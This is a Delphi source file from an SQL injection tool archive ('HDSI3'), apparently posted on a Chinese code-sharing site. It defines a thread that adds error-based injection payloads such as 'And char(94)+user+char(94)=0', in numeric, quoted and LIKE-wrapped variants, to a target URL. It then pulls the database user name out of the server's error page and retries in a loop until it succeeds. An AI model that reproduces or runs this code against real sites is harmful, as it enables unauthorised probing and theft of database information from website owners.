📄 threaderrordbuser.pas

📁 sql inject HDSI3--delphi.rar
💻 PAS
字号:
unit ThreadErrorDBUser;

interface
uses
Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs;

type
  TThreadErrorDBUser = class(TThread)
  FURL:string;
  complete:boolean;
  private
  function GetURLContent(URL: string): string;
  procedure GetUser(str_url:string);
  function GetURLMsgDBUser(URL: string):string;
  function GetResultStr(str: string): string;
  private

  published
  procedure Execute; override;
  public
  end;
implementation
uses
main_unit,CJdatabase_unit,define_unit,ThreadHttpGet;
//******************************************************************************

procedure TThreadErrorDBUser.Execute;

begin
    complete:=false;
    GetUser(FURL);
    complete:=true;
    ThdObjCompleteCount:=ThdObjCompleteCount+1;
end;
//******************************************************************************
function TThreadErrorDBUser.GetResultStr(str: string): string;
    var
        iStart, iEnd: integer;
        ss: string;
    begin
        iStart := pos('^', str);
        if iStart > 0 then
        begin
            ss := copy(str, iStart + 1, length(str) - iStart);
            iEnd := pos('^', ss);
            if iEnd > 0 then
            begin
              ss := copy(ss, 1, iEnd - 1);
            end;
        end;
        if ss = '' then
          Result := '未知'
        else Result := ss;
end;
//******************************************************************************
//函数：判断某个页面是否存在
function TThreadErrorDBUser.GetURLMsgDBUser(URL: string):string;
var
    ss:string;
    label start;
begin
    start:
    ss:=GetURLContent(URL);
    result:=GetResultStr(ss);
    if result='未知' then
    goto start;
end;
//****************************************************************************
//获取页面内容
function TThreadErrorDBUser.GetURLContent(URL: string): string;
var
    IdGetObj:TThreadHttpGet;
    
begin
  try

    Result := '';
    IdGetObj:=TThreadHttpGet.Create(true);
    IdGetObj.TimeOut:=TimeOut;//timeout30秒
    IdGetObj.FURL:=URL;
    IdGetObj.Success:=false;
    IdGetObj.Resume;
    while not IdGetObj.Success do
    begin
        application.ProcessMessages;
        sleep(50);
    end;
    Result :=IdGetObj.sContent;
  finally

       IdGetObj.Free;
       IdGetObj:=nil;
  end;
end;
//******************************************************************************
procedure TThreadErrorDBUser.GetUser(str_url:string);
var
URL:string;
str_ext:string;
begin
 
  str_ext:='%20And%20char(94)%2Buser%2Bchar(94)=0';
  case Inject_methord of
      0:    begin
              //Application.MessageBox(pchar('该注入地址可能无法注入,未知的注入方式'),'警告',mb_ok+mb_iconinformation);
              exit;
            end;
      1:    begin
              URL:=str_url+str_ext;
            end;
      2:    begin
              URL:=str_url+'''%20'+str_ext+'%20And%20''''=''';
            end;
      3:    begin
              URL:=str_url+'%25''%20'+str_ext+'%20And%20''%25''=''';
            end;
  end;
  //*********************
  try      // char(12)='|' ,%2B解释为+号
  Form_main.suiEdit_user.Text:=GetURLMsgDBUser(URL);
  except
    on E:Exception  do
      begin
        Application.MessageBox(pchar('获取当前数据库的用户出现异常，操作终止！'+#10#13+E.Message),'提示',mb_ok+mb_iconinformation);
      end;
    end;
end;
end.
⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -